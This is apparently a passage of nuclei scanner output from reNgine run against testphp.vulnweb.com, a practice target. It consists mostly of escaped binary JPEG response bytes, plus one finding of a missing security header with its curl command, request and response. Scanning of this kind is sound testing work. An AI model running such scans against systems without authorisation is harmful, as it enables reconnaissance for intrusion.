\ufffd\\u0026U\\ufffd\\u0018\\ufffd\\u001e\\ufffdަ%@!\\ufffd\\u0018k\\ufffd\\ufffd\\ufffdTD̐5\\u001d\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd(\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffd\\u001b}\\ufffd.VO̩%\\ufffd\\u0013\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\u0008+\\ufffdFőNH\\ufffd\\ufffd\\u001c0\\ufffd:9\\ufffd\\ufffdCGM\\u001c\\u0014\\ufffdG\\u0014(X\\ufffd\\\"\\ufffd\\u0001\\u003eO\\ufffdp\\ufffd\\u003ep\\ufffd\\ufffd4\\u0003C%e\\ufffd\\ufffd=\\u0015E\\ufffd\\ufffdFD\\ufffd1\\ufffd\\ufffdң\\u0010\\ufffd\\ufffdXn\\ufffdY\\u0018\\u0016![,U\\ufffd쓫UCMM\\u001b\\ufffdm\\u0013\\u0011\\ufffd\\ufffd\\ufffd\\ufffdŞA;\\u0004\\ufffd\\ufffdq\\ufffd\\ufffd(\\u001fh\\ufffdt\\u000e\\ufffdG\\ufffd\\ufffdt\\ufffd\\ufffd\\n\\ufffd\\u001b?\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd~\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdeH\\u0016\\u0015!\\ufffd\\u001c\\ufffdrc\\ufffd\\ufffd\\\"eo\\ufffd\\ufffd\\ufffd׌\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c!)\\u000eO\\ufffd\\ufffd\\u001b\\ufffdttQ\\ufffd\\ufffdp\\u000cq\\ufffd#2\\ufffdԜ\\u0003\\ufffd\\u0007?\\ufffd\\ufffd[\\ufffd\\ufffd\\u0000\\ufffd5]Z\\ufffdDp\\ufffd\\ufffd6KHi\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd k\\ufffdC\\ufffd\\ufffd\\u000bURW%1h\\ufffdf\\ufffd0LNHʹ\\u0005pp\\ufffd[$\\u00128\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4k4k\\u000ctp\\ufffdQ\\ufffdj\\u0014\\u0006\\u0005\\ufffd\\ufffd\\ufffd\\u0004d\\ufffdb\\u003e\\ufffd\\ufffd\\u0000涁d1\\u0019^I;_/u\\ufffd`\\ufffdU\\ufffdϾ\\ufffdPO\\ufffd(\\u001eڪ\\ufffdSb'\\n9\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdQ\\ufffd\\u001bco\\ufffdV\\ufffd\\ufffd(\\ufffdo.\\ufffd`\\u001e\\ufffd砺\\ufffd\\ufffd=\\u001bU4\\ufffd_s\\ufffd\\ufffd\\ufffd̴\\ufffd0H\\ufffd`\\ufffd]\\ufffd%\\ufffdڛd9\\u001e\\ufffd\\ufffdǖ\\ufffdjΣ\\ufffd{\\ufffd\\ufffd\\ufffd%m\\ufffd\\ufffd$\\ufffd\\ufffdMٍ\\ufffdi\\ufffdA\\ufffd~\\u0000\\u0000\\ufffd\\u0007 \\ufffd\\ufffdg!\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffdG'|\\ufffdL\\ufffd\\ufffd\\u0015\\ufffdU5\\ufffd\\ufffdF\\u0019\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd^K\\u0013C̣-9\\ufffdm\\u0015\\u003cw\\u0010\\ufffd\\u0019\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd|A\\ufffdZ\\ufffd\\ufffdqhb\\ufffd\\ufffdX)\\ufffd\\ufffdV.\\ufffd\\n$\\ufffd\\ufffdV\\ufffd\\ufffd\\u003e\\ufffdAb\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffdH\\ufffdե\\ufffd\\ufffdnL\\ufffd\\ufffd!M\\ufffd\\ufffd\\ufffd#:=\\ufffd-Cp4\\ufffd\\ufffdV\\ufffd\\ufffde\\ufffdd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd$\\ufffd]\\ufffd9\\u000c\\ufffd\\u0001\\ufffd\\u003cc\\u001ccZGZOWm\\ufffd\\ufffd\\ufffd\\ufffdVe\\ufffd\\ufffd\\ufffd5c*\\u0026\\ufffd\\u0000\\ufffdO\\ufffdn\\ufffd9\\u003c\\ufffd\\ufffd\\ufffd\\ufffd5΢\\ufffdݣ9\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdMyBQ\\ufffdwY\\ufffdw\\ufffd*\\u000c\\u0001fWڏ\\u000e\\ufffd\\ufffd\\u0012\\ufffd\\ufffd\\u0019\\ufffd8]\\ufffda\\u0019\\u0004\\ufffd\\ufffd\\u0000\\u001fQ[SU\\ufffd\\ufffd\\ufffd\\u001c\\u0014\\ufffdћ\\\\Tp\\\\.\\u0017j\\ufffdV\\ufffd\\ufffd\\ufffd!\\u000b\\u0012\\ufffdQcUe-\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdP\\u0000;\\ufffd\\ufffd\\ufffd\\ufffdE4d\\ufffd)h\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd \\u0012\\u0001ǶH\\ufffd\\ufffduk}ɵ-.\\ufffd\\ufffd\\ufffd\\ufffdgO\\ufffd\\ufffd7;G\\ufffd\\ufffd\\ufffd-ӿs\\ufffdN\\ufffdVDA\\u0019ld\\ufffdJ\\ufffd2\\u0000$\\u0003\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffd7U.\\ufffdY%\\ufffd\\ufffdZ%\\ufffd\\ufffd\\ufffd\\ufffd\\ufffde\\ufffd\\u0003~\\u003eV%X\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\ufffd\\u0018%z\\ufffdWM;F\\ufffdv\\u001f\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdé\\ufffd\\ufffd\\ufffd\\ufffd}?UCp\\ufffd[\\ufffdvj\\ufffdTn\\ufffd\\ufffd~\\ufffdɂ\\ufffdF1\\ufffd\\ufffd\\ufffd\\ufffdO,t\\ufffd\\ufffdq\\ufffd\\u0008\\ufffd\\ufffdϏ\\ufffdT\\ufffd\\ufffdm\\ufffd\\ufffd8;\\ufffd\\ufffd+A\\ufffdKUl\\ufffdW$\\ufffd{c\\ufffd;\\ufffd\\ufffdȩj'W\\u0006\\u0005A\\ufffd\\u001bҪIS\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\rc\\u0015\\u0015\\ufffd_\\ufffd\\ufffd\\ufffdqV\\u001d\\ufffdaI6\\u0000\\u000e\\ufffd\\ufffd]\\ufffd\\r\\ufffdU\\ufffd\\ufffd\\ufffd\\n\\ufffd[WY]h\\ufffdJ\\ufffd\\ufffdm\\ufffd\\ufffdWYd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd(\\ufffd\\ufffdQ\\u0013v\\ufffd\\ufffd@_\\ufffdQ\\ufffd\\ufffds\\ufffdܱ\\ufffd\\ufffd5\\ufffd\\ufffdA\\u0007b\\ufffd\\ufffd9h\\ufffd+$\\ufffdUWA\\ufffdHm\\ufffdGX\\ufffd\\u0003\\u0003f\\ufffdƒ\\ufffd\\ufffdY%\\ufffd\\ufffd\\ufffd\\ufffd.'\\u0019=3\\ufffd\\ufffd\\ufffd\\u0015E\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdA\\ufffdx^E\\ufffd\\ufffd\\ufffd@'\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u001af\\u001bF\\ufffd\\ufffd6\\ufffd\\ufffd@\\ufffd\\u003c\\ufffd\\\",c\\ufffd\\ufffdJ)c\\ufffd!|\\u000c\\ufffdg\\ufffd\\u0001\\ufffd\\ufffd\\ufffd%\\ufffd\\u000f\\ufffd\\ufffdm!xo\\ufffd\\u0000\\ufffd\\\\\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffd\\u003cU\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\r\\ufffd\\ufffdOG\\u0019\\ufffdD\\ufffd3\\ufffdF|\\ufffdi\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\r\\u001fv\\ufffd\\ufffdX;\\ufffd\\ufffdh{\\ufffd\\ufffd\\ufffd\\\\\\u0005]\\ufffdrJ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffd;!\\ufffd\\ufffd\\\"\\ufffdv\\ufffdz\\ufffdV+\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffdV\\ufffd\\ufffd\\ufffdxRV=Ѝ\\ufffd\\u0004\\ufffd\\ufffdD\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\u0015$\\ufffdM\\ufffd\\ufffd:\\u0003\\ufffdT\\ufffd\\ufffd\\ufffdۜ\\ufffd\\ufffd[;\\ufffd\\u0010IfR\\ufffdN\\u000b\\u001e[\\ufffd\\u0006p\\u003ch\\ufffd)\\ufffd#Ս\\u000fo|\\ufffd\\u0010e:\\ufffd|\\ufffd\\u0011\\ufffd\\ufffdc\\ufffd\\ufffd\\u0010\\ufffd}\\ufffduf\\ufffd\\u000cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-Mgj\\u0026bx\\u0003?MA\\ufffd\\ufffde\\u000c$\\ufffdH$\\u001c4r.\\ufffdS\\ufffdy\\u0007\\ufffd\\u001f\\ufffd\\ufffdt\\ufffd\\u0007\\ufffd:\\ufffdc\\ufffdyo\\u0018\\u001a\\u0005\\\"\\ufffd\\ufffd\\u001b\\ufffd\\ufffd5c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\u000e\\u000f\\ufffd\\ufffdЕ\\\\\\ufffdT\\ufffd\\ufffd[N\\ufffd\\ufffd;\\ufffd\\ufffd*\\ufffdi\\ufffd\\ufffdU\\ufffd\\u0000e\\ufffd$c \\ufffdyʰP\\ufffd\\ufffd[\\u00168\\ufffd\\ufffd\\u0014\\u0014o\\ufffd\\u003c=\\u0013\\ufffdSG\\u001f\\u000c\\ufffd3\\ufffd\\u0002|ꅪ袞W\\ufffd\\ufffdZр\\ufffd;\\ufffd\\u001e\\u0018{6\\u003ed?\\ufffd\\u0006\\u001b\\ufffd\\ufffd\\ufffd\\ufffd}_\\ufffd\\ufffdY\\u001fn\\ufffdR\\ufffdH\\u0003,sQwx`\\u0000;\\u001dH \\ufffd\\u0018\\ufffd\\ufffd\\u0004{\\u001d\\u0015^\\ufffdn\\ufffd\\ufffd\\ufffdvJ\\ufffd=\\u001a\\u001b\\ufffdD\\ufffd\\ufffd2mٖ*@E\\u0001\\ufffd*\\u000cP\\u0007\\ufffdF2F\\ufffdnW8\\ufffd\\u000c' \\ufffdd\\u001d\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdo\\u0017Q\\ufffd[t\\u000f\\ufffdj\\ufffd\\ufffd\\ufffde\\u0013R\\ufffdOGN\\ufffdݎ\\ufffd\\u0011\\u001231J\\ufffd!US\\ufffd2\\u0008\\ufffd\\ufffdr\\t'ZM\\ufffd\\ufffdYx\\ufffd\\ufffdd\\u0011\\ufffd\\ufffdW\\ufffdY\\ufffd*e_F\\u0019\\u0015\\ufffd\\ufffdh\\ufffd\\ufffdK\\u0002\\ufffd\\ufffd\\ufffdIпº\\ufffdT\\r;\\ufffdf\\ufffd\\ufffd\\ufffdQ+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd;{{\\ufffd\\u0000g\\ufffd\\u00060\\ufffdc\\ufffdt۽eB[n]\\ufffdI\\ufffd\\ufffdPc\\u000b\\u0018\\u0007\\u0001pp\\u000f\\ufffd\\u00089\\ufffd\\ufffd\\ufffd\\ufffd\\u0005d\\ufffd\\u0013?\\ufffd\\ufffd\\u0001\\ufffd\\ufffds\\ufffd\\ufffd׿\\ufffd4T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|J\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\u0015\\ufffd6\\ufffd\\ufffd\\ufffdi\\u0016)\\ufffd\\ufffd\\ufffd\\u0001e\\ufffd\\ufffdrB\\ufffd\\u0007\\ufffd\\ufffd\\u000c\\u0002\\u00179\\u0004\\u0003\\ufffdz:\\ufffd\\ufffd\\ufffdG/e@\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffdj\\ufffd\\ufffd=\\u00038P?P\\ufffd\\ufffd\\u003e\\u0017\\u001bpwj\\ufffd\\ufffd\\u0015l7\\u001b\\u001d\\ufffd\\u000b\\ufffd(\\ufffd\\ufffd\\u0011\\u0011hX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:24.658301677Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , 